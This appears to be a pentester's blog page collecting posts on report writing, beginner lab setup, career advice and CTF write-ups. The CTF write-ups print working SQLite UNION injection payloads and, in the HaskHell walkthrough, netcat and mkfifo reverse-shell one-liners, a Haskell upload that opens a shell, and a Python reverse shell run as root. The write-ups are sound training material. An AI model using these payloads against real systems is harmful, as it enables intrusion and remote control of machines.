Overview of Talks and Workshops



How to write a pentest report

A few months ago I passed the eWPT exam. That is when I realized that writing a pentest report can be hard for people who have just broken into the industry.

This article gives some simple steps on how to write a pentest report and lists the important elements that should be in it. It aims to give professionals new to the field some advice on how to write a report for exams or for customers. It can also be used by bug hunters (see the vulnerability report part).

This article is short on purpose: I want it to be clear but not tedious to read, as the process of writing a report can seem scary to newcomers.

Why do we need a report?

A report is the document that presents all your findings and explains them to every role in the company that hired you for the engagement. It contains the scope previously defined with your customer, high-level explanations of the findings and their impact, and precise technical descriptions of every finding. A report is made of several parts.

The Executive Summary

This is the part written for the executives of the company who will read the report. It must give high-level explanations with no technical details.

It is relevant to add graphs of the findings such as: Vulnerabilities by impact, Attacks by type and Vulnerabilities by cause.

The definitions in MITRE CWE can help you choose the categories to use in those graphs.

It can also contain a global assessment of how the findings, and combinations of attacks built from them, could impact your customer's business.
It is also useful to include a remediation priority based on your expertise and the prior discussions you had with your customer.

The Vulnerability Report

This is the part where you present each vulnerability you found. I recommend ordering them by severity.

Each vulnerability should have a score, which you can calculate with CVSS. Here is a calculator. This score takes precise metrics into account to produce a value as close as possible to the impact the vulnerability could have. However, depending on your customer's context, the real impact might differ; your expertise and the prior conversations you had with your customer about their business are what will help you define the impact for them. You don't need to tamper with the CVSS metrics to reflect this: that is the goal of the remediation priority I mentioned in the previous part.

Here is a way to present it:

  • Severity
  • CVSS score
  • Affected item
  • Description: explain the vulnerability and place it in the context of your target. For example: « In the context of the support page, some checks were made on the client side, but those checks could be bypassed. »
    Feel free to add resources about the vulnerability
  • Remediation: explain how to mitigate the vulnerability. It is always good to add resources from recognized industry standards such as OWASP for web pentesting reports.
  • Evidence: add proof of the vulnerability. The goal is that the team implementing the mitigation is able to reproduce the attack. That is why it is important, during the attacking phase, to write plenty of notes and take plenty of screenshots and other proof.

Note: I personally prefer when each vulnerability is presented together with its remediation, but you can also write a separate remediation report part right after this one.

Useful Resources

Here is a great template done by Andrew Morrison (docx and odt):

  • Pentext is a collection of XML templates, XML schemas and XSLT code, which combined provide an easy way to generate IT security documents including test reports
  • Pentest standards about reporting
  • Radically Open Security provides in their portfolio some reports of projects they did. Those are good examples.
  • MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
  • CWE is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts.
  • OWASP list of vulnerabilities (for web pentesting)
  • Exploit db is a great resource for exploitation
  • National Vulnerability Database by the US CERT

Metasploit Community CTF 2020 – 2 of Spades

Setting up the attacking machine

Access a browser and use Burp or a proxy

I wanted to explain the setup details because I really think it is useful for anyone who would like to play CTFs and needs to access a browser when the connection to the attacking machine is made through SSH.

So this introduction aims to be useful for any CTF, or even for daily practice at your job.

You will have to use the -D and -C options when launching the command:

sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444

-D specifies the local port you wish to use for forwarding (SSH opens a SOCKS proxy on it)

-C enables compression

-i specifies the location of the key file

Then we need to configure this SOCKS proxy in Burp under the User options tab (it can also be done under Project options; it depends whether you wish to keep it permanently or just for a specific project).

Then you can configure your browser proxy as you usually do when using Burp Suite (note: this picture shows FoxyProxy, a Firefox add-on that I would recommend to anyone who often works on web pentests):

Proxychains

For this CTF my teammate CptButtStuff was using proxychains, an amazing tool that routes the traffic of a local program through a proxy.

Here is how to set it up:

Open a new tab and run ssh again as follows, using a different port than the one you used for Burp:

sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555

Edit the proxychains conf file /etc/proxychains.conf:

socks5          127.0.0.1 5555

And then you can launch any program you wish through proxychains (here I am using nmap):

proxychains nmap <IP-ADDRESS>

Cool! But how can I get a file from the remote host to my local machine?

You can use scp as follows:

scp -i private_key.pem username@remote:/path/to/file /local/dir

The Challenge

Now that we have a setup ready (and not only for this chal 😀 ) we can work on 2 of Spades.

On port 9001 the service was HTTP (see below the extract of my nmap scan):

9001/tcp open  http        Thin httpd
|_http-server-header: thin

When we browse to this page we get a form:

One of the first things that comes to mind with a form is SQL injection, so I tried this and got a nice error disclosing plenty of info:

' Union select 1, 2 --

This basically means that we need to add another column to the UNION.

And there we go:

Now that we know that the backend DB is SQLite, let's find some good payloads to dump the database:

https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet

Table name enumeration: SELECT name FROM sqlite_master WHERE type='table'
Table schema enumeration: SELECT sql FROM sqlite_master WHERE type='table'
Payload chosen

I used this one and got the schema of the tables:

' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --

The first line is exactly the one we need, so now we can query the information required to get the flag:

' Union SELECT 1, flag, link from hidden --

And there we have it: we just need to wget the png file and md5sum it to get the flag:

wget http://<IP>/eGHaMBu2XWvRA5cu/2_of_spades.png
md5sum 2_of_spades.png
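To show why this form was exploitable and what the fix looks like, here is an added Python example (not code from the challenge or the original post). It runs the three payloads above against a constructed in-memory SQLite schema (table and column names are assumed, modelled on the write-up) through a string-concatenated query, beside the parameterized query that neutralizes them.

```python
import sqlite3

# Constructed sample schema: a three-column lookup table behind the form and a
# 'hidden' table holding the flag and link. Assumed, not the challenge's real schema.
SCHEMA = """
CREATE TABLE cards (id INTEGER, name TEXT, description TEXT);
CREATE TABLE hidden (id INTEGER, flag TEXT, link TEXT);
INSERT INTO cards VALUES (1, 'two of spades', 'a low card');
INSERT INTO hidden VALUES (1, 'FLAG{constructed-sample}', '/constructed/2_of_spades.png');
"""

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def search_vulnerable(conn, name):
    # String concatenation: the input becomes part of the SQL grammar, so a
    # quote closes the literal and a UNION can read any table.
    sql = f"SELECT id, name, description FROM cards WHERE name = '{name}'"
    return conn.execute(sql).fetchall()

def search_safe(conn, name):
    # Parameter binding: the input is only ever a value, never SQL.
    sql = "SELECT id, name, description FROM cards WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()

def leaked_error(conn, name):
    """Return the database error text the vulnerable query would expose, or None."""
    try:
        search_vulnerable(conn, name)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

if __name__ == "__main__":
    db = open_db()
    # Two-column UNION against a three-column query: the column-count error.
    print(leaked_error(db, "' Union select 1, 2 --"))
    # Three-column UNION dumping the schema, then the hidden table.
    print(search_vulnerable(db, "' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --"))
    print(search_vulnerable(db, "' Union SELECT 1, flag, link from hidden --"))
    # Same payload through the parameterized query: nothing matches.
    print(search_safe(db, "' Union SELECT 1, flag, link from hidden --"))
```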

Flag

All roads lead to Cybersecurity

It has always been difficult for me to get a concrete idea of what a job involves, especially in the changing world in which we live.

In the 21st century, the importance of transversal skills as meta-skills is becoming apparent. In other words, in the world of cybersecurity, a job may contain different skills needed to be effective in its practice. In cyber professions, whether technical or non-technical, learning how to learn becomes essential to adapt to a rapidly changing environment.

This demand for flexibility encourages observation, evaluation and analysis, while sharing with your peers resources, expertise and vision for protecting citizens’ data and their way of life.

Living in the 21st century disrupts traditional learning through continuous learning, but how to transform information into knowledge?

In this article I will try to answer the questions: What are the different areas of cybersecurity? What skills are needed to work in cybersecurity? What careers are there?

The different areas in Cybersecurity

The careers in Cybersecurity

Which skill for which career?

About degrees and salaries

Cybersecurity being a young field, degrees are not the only way to get a job; the experience and motivation of the candidate remain what makes the difference for an employer. You can train yourself, pass certifications and engage with cybersecurity organizations to demonstrate this motivation.

How to get started with pentesting?

When people ask me how to get into pentesting, the first thing I say is that practice is essential. But how do you practice pentesting on your own? How do you get started with virtual machines?

In this article I am going to explain how to create a virtual attacking machine. With this machine, you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the websites you can use for practice.

Practicing this way is very helpful because it is the closest way to understand pentesting (it is not realistic, but you will learn the core techniques used in pentests).

How to get started?

Create your virtual attacking machine with Kali Linux

  1. Download VirtualBox and install it: https://www.virtualbox.org/
  2. Download the latest Kali Linux VirtualBox image (it is going to be our attacker machine). Make sure to take the VirtualBox image and not the VMware one:
  3. Install Kali:
  • Go to VirtualBox and click on « File » > « Import Appliance… »
  • Click on the yellow folder, navigate to the Kali image you downloaded, select it and click on Open
  • Click on Next and then on Import. It will take a little while… Then launch it for the first time. The username should be kali and the password kali, but you can find this info on their website or in the description of your machine in VirtualBox

What website can you use?

Some great starters

First I would recommend creating an account on TryHackMe here, it's free! Then you will have to download your configuration file and connect to the VPN so you can start hacking away on their machines.

What is awesome about TryHackMe is that you even have a box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will be useful not only on TryHackMe but also on other platforms and in your daily practice as a pentester (we do sometimes need a VPN to access the customer systems we test).

If you are not familiar with VPNs, here is a Wikipedia article explaining what they are. Simply put, you can see a VPN as a tool that gives you access to another computer or environment remotely. TryHackMe and other pentesting practice websites require a VPN so that you can reach your practice environment, usually a vulnerable machine to hack.

If you are not familiar with Linux, TryHackMe has a box that explains it very well, and you even get a cool badge by completing it! You can also practice on overthewire.org, a wargame website where you will learn about Linux and security concepts. If you want more explanations of the concepts, you should definitely go to linuxjourney.

After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.

Here is a list of great boxes (all free) on TryHackMe for beginners:

There are plenty more; I really recommend you have a look around.

Push your skills further with other platforms

You have covered the beginner skills? You want to go further? Here are some useful resources for that.

Writeup – TryHackMe HaskHell

Today I am going to present the write-up for HaskHell on TryHackMe.

First of all, after having deployed the machine, we can run nmap on the target IP.

Nmap

nmap -p- -sV 10.10.54.105

Result of Nmap:

kali@kali:~$ nmap -p- -sV 10.10.54.105 -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-11 11:40 EDT
Nmap scan report for 10.10.54.105
Host is up (0.23s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5001/tcp open  http    Gunicorn 19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1183.25 seconds

We can see that port 5001 is open and serves HTTP.

Let’s have a look at Port 5001

Go to http://<target-ip>:5001

Homepage of the haskell course

If you click on « homework here » you will find a page with an exercise.

Homework

The link to submit the exercise responds with a 404.
Also, the following screen shows us that this teacher has already had hacker students:

Hint

This also gives us a huge hint: we can submit a Haskell script and it will be executed. So let's try to make a reverse shell.

But first let's try to execute a command. Here is the documentation for executing a command with Haskell: System.Process on Hackage.

We also need to find where to upload our script, so let's run dirb.

Dirb

Dirb result
http://10.10.54.74:5001/submit
The page where we will submit our shell

Okay, now that we know where to put our script, let's write it!

Reverse shell with Haskell

I did not know anything about Haskell, so after some digging I found out that I had to save my script with a .hs extension for it to be recognized and executed by our target.

Also, the text in homework1 specifies: « Your file will be compiled and ran and all output will be piped to a file under the uploads directory. »
This means that we will be able to see our output and errors in order to debug our script if we need to (which was really helpful for me).

First I tried a simple ls:

#!/bin/env runhaskell
import System.Process

main :: IO ()
main = do
 let stdin' = ""
 -- run "ls -lar" and capture its exit code, stdout and stderr
 (errCode, stdout', stderr') <- readProcessWithExitCode "ls" ["-lar"] stdin'
 -- everything printed here ends up in the output file under uploads/
 putStrLn $ "stdout: " ++ stdout'
 putStrLn $ "stderr: " ++ stderr'
 putStrLn $ "errCode: " ++ show errCode

And I got this:

On pentestmonkey.net we find the following command:

nc -e /bin/sh 10.0.0.1 1234

So I tried netcat with the -e option, which specifies what to run once the connection is made.
However, there were two errors in my case: my port 1234 was busy, and the netcat command on the target did not support the -e option. Resolving the first error is easy (I changed my port to 8888) but not the second one 🙂
So the script that worked for me was the following one:

module Main where
import System.Process

-- fifo-based reverse shell for netcat builds without -e; replace <your-ip> with the listener address
main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 8888>/tmp/f"

Indeed, according to this website, the following command works with the other netcat versions:

#other version of netcat 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8888 >/tmp/f

Do not forget to launch your listener on your attacking machine before uploading the script:

nc -lvp 8888

And then we get a shell:

And we can get the user flag:

$ ls
__pycache__
user.txt
$ cat user.txt

Now that we have user, we need to get root. But first let's find a way to avoid having to connect through our web shell. Let's try to use SSH. If we navigate to the user's .ssh folder, we find a key pair.
Let's get those onto our attacker machine by running Python's simple HTTP server.

Then from the attacking machine we can connect through SSH after having set the proper permissions on our private key (700).

To have an interactive shell we can run this:

python -c 'import pty; pty.spawn("/bin/bash")'

And there we go:

Linux enumeration with linPEAS:

Let's upload linPEAS to our target machine.

On our kali we run

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

And then we launch Python's simple HTTP server to serve it to the target.

And from our target we get it with:

$ wget http://10.2.28.215:8000/linpeas.sh
$ chmod 755 linpeas.sh
$ ./linpeas.sh

linPEAS is very good, but in this context we could have run sudo -l first and that would have been enough. It is a good habit to try this before doing anything else.

Here is what we get if we run flask:

Trying to run flask

Well, this is very useful. We know that we need to write a script and launch it as root. In my case I did a reverse shell, but it can be even easier to just launch a shell with a Python command.

Here is the reverse shell I did with a script:

#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("your-ip",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

We then just have to set up a new listener on our attacker machine:

nc -lvp 8888

We then transfer our script to the target machine.

And we run our script as root from the target machine:

We get a shell on our attacking machine. So let's run our command to get an interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

We now have the root flag:

Getting root flag

CSNP – What is pentesting?

CyberSecurity NonProfit (CSNP) is a 501(c)(3) nonprofit organization that provides free security education and resources to make cybersecurity more accessible, inclusive, and diverse.

I was invited to talk and I discussed what pentesters do, what skills are needed, and how to start a career in pentesting. I also demonstrated web application exploits such as SQL injection and cross-site scripting (XSS).

Worldtour Podcast: series 3 episode 1
With Masarah Paquet-Clouston

The World Tour Podcast
Masarah Paquet-Clouston

Masarah Paquet-Clouston is a security researcher at GoSecure, a PhD candidate in criminology at Simon Fraser University and a collaborator on the Stratosphere IPS project in Prague. She conducts research in the field of cybercrime. In recent years, her research has focused on botnets, bitcoin tracing, online drug trafficking and organized crime. In 2016, Masarah won the Mitacs award for her research on « fake likes ».

Today, she talks to us about her career path, her research and her involvement in increasing the visibility of women in the cybersecurity field.

You can follow Masarah and her research activities on: Google Scholar, Twitter, Linkedin

Masarah Paquet-Clouston
Listen on this page

Worldtour Podcast: Series 3 episode 2
With Lisandre Cadotte

The World Tour Podcast
Lisandre Cadotte

Lisandre Cadotte is a pentester at Vidéotron, a Quebec telecommunications company. She has more than six years of experience in the cybersecurity field.

She often takes part in CTFs and publishes write-ups on her site, along with a large collection of resources useful to pentesters. She is also passionate about music.

In this episode, Lisandre talks to us about her career path, her job and her vision of cybersecurity.

You can follow Lisandre on Linkedin or visit her site.

Lisandre Cadotte
Listen on this page